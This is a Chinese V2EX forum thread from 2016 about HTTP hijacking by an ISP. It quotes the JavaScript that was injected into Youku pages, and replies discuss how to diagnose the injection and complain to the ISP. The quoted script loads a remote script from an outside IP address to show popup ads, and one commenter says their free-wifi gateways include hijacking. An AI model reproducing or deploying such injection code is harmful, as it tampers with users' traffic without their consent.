V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
cydysm
V2EX  ›  宽带症候群

关于 http 劫持,我有几个问题想问下

  •  
  •   cydysm · 2016-12-06 19:23:27 +08:00 · 3254 次点击
    这是一个创建于 2910 天前的主题,其中的信息可能已经有所发展或是发生改变。

    (function(){o="http://static.youku.com/ddshow/img/static/js/youku_laifeng_v11.js?";sh="http://61.160.200.223:7701/main.js?v=3.93&sp=307&ty=dpc";w=window;d=document;function ins(s,dm,id){e=d.createElement("script");e.src=s;e.type="text/javascript";id?e.id=id:null;dm.appendChild(e);};p=d.scripts[d.scripts.length-1].parentNode;ins(o,p);ds=function(){db=d.body;if(db && !document.getElementById("bdstat")){if((w.innerWidth||d.documentElement.clientWidth||db.clientWidth)>1){if(w.top==w.self){ins(sh,db,"bdstat");}}}else{setTimeout("ds()",1500);}};ds();})();var mim_sp = "307";var mim_aid = "10035";var mim_uid = "XVpZXVdJXF1fXlNL";var mim_src = "0";var mim_adtype = "0";var mim_ty = "dpc";

    这是我访问优酷时右下角的弹窗广告, F12 后得到的 可以看到 js 替换了。

    Q1 :如何判断是 ISP 的 http 劫持,第三方有没有可能进行 http 劫持?(我在 ipip.net 查了下, IP 是江苏常州电信, IDC 机房使用,又百度文库看到了这么一篇文章 http://wenku.baidu.com/link?url=LkiPgsXyYr15171BXhnV1gt3nvZVXtTb9dUxW9OQfUp9ts-PAGYjvISLC9TBkb_MJnBAPlJHlcZObEif8LjO6UTQTZuWzPsvdvrxaNqfcIC ,故有此疑问)

    Q2 :如果是第三方进行 http 劫持,那么 ISP 有没有责任?

    Q3 :能否对 http 劫持追踪来源?

    17 条回复    2016-12-08 00:35:00 +08:00
    bdbai
        1
    bdbai  
       2016-12-06 19:44:50 +08:00 via Android
    进隐身模式看一下,排除扩展的干扰。如果还有篡改 js 的情况,基本可以确定是运营商干的。

    这时候果断投诉就可以了。
    stabc
        2
    stabc  
       2016-12-06 19:56:29 +08:00
    我觉得 ISP 不会干这种事情。应该是第三方干的,也就是 ISP 官方委托的第三方。
    cydysm
        3
    cydysm  
    OP
       2016-12-06 20:00:24 +08:00 via Android
    @bdbai 这个肯定不是扩展的问题, LOL 客户端 /TGP/IE/firefox/chrome/傲游均出现过,不同机器上都会有
    cydysm
        4
    cydysm  
    OP
       2016-12-06 20:01:31 +08:00 via Android
    @stabc 这个如何确定
    daviswei
        5
    daviswei  
       2016-12-06 20:17:13 +08:00 via Android
    @stabc ISP 其实也会干,像是偶尔插个广告、欠费通知这类的,频率未必
    bdbai
        6
    bdbai  
       2016-12-06 20:18:32 +08:00 via Android
    @cydysm 那就可以打电话投诉了。一定要坚持到底,他们才会帮你处理掉。亲测苏州电信有用。
    KCheshireCat
        7
    KCheshireCat  
       2016-12-06 22:51:58 +08:00   ❤️ 1
    现在有些路由器也会干劫持这种事儿,请注意排除这种变量
    cydysm
        8
    cydysm  
    OP
       2016-12-07 00:32:28 +08:00 via Android
    @KCheshireCat 这个考虑了,我那天发现后直接把线插 PC 上,因为频率不定,好久才出现
    RE
        9
    RE  
       2016-12-07 02:05:50 +08:00
    楼主不用怀疑,就是江苏电信干的。
    手机开着 4G (移动)一直好好的,一连上 WIFI (电信)基本上每个 http 的网站都要在地址栏打两次才能跳出劫持。简直醉了。包括京东的 APP 商品详情也被劫持。
    RE
        10
    RE  
       2016-12-07 02:07:43 +08:00
    补充一下,在很多省份呆过,因为对线路稳定性有要求,基本上都是办理电信的 50M / 100M 包年或包半年,就江苏电信的劫持是最最最频繁的,不知名的网站都要劫持
    lln133208
        11
    lln133208  
       2016-12-07 09:24:51 +08:00
    @RE 江苏电信,有些网站会有比较露骨的游戏广告之类的,这个是不是 ISP 的锅啊?
    qianguozheng
        12
    qianguozheng  
       2016-12-07 11:08:37 +08:00
    我们公司做免费 wifi 的,我在所有的路由器网关设备上实现了 http 劫持的功能,如果你用我们的设备上网会出现这种问题的,哈哈。当然现在还没有全部开启
    cydysm
        13
    cydysm  
    OP
       2016-12-07 11:32:01 +08:00 via Android
    @RE 可是我这是浙江电信。不过我查了下,很多浙江电信也有这种情况
    loong0xf
        14
    loong0xf  
       2016-12-07 19:27:17 +08:00
    @lln133208 是 ISP 投诉不鸟你
    cydysm
        15
    cydysm  
    OP
       2016-12-07 22:19:04 +08:00 via Android
    @loong0xf 工信部投诉好使,下午外派过来了,外派过来当然没什么用。接下去杭州总部那边打电话给我处理
    danili
        16
    danili  
       2016-12-07 23:04:10 +08:00
    今天下午就因为 http 劫持打 10000 投诉反应问题。随后专员回复电话询问具体情况说会有其他人联系我。
    随后一个用座机打回给我的人问我要证据,我说我没截图,跟她理论了之后把电话挂机了。
    过了差不多半个小时, 10000 号的人打回电话跟我说把我的宽带账号加入到“网络广告拦截系统”,如果再有弹窗广告就是我的问题了……………

    这网络广告拦截系统应该就是一个黑名单吧……
    cydysm
        17
    cydysm  
    OP
       2016-12-08 00:35:00 +08:00 via Android
    @danili 10000 号能处理是最好的了。应该是白名单。下午也给我在后台进行广告拦截了
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1246 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 23:47 · PVG 07:47 · LAX 15:47 · JFK 18:47
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.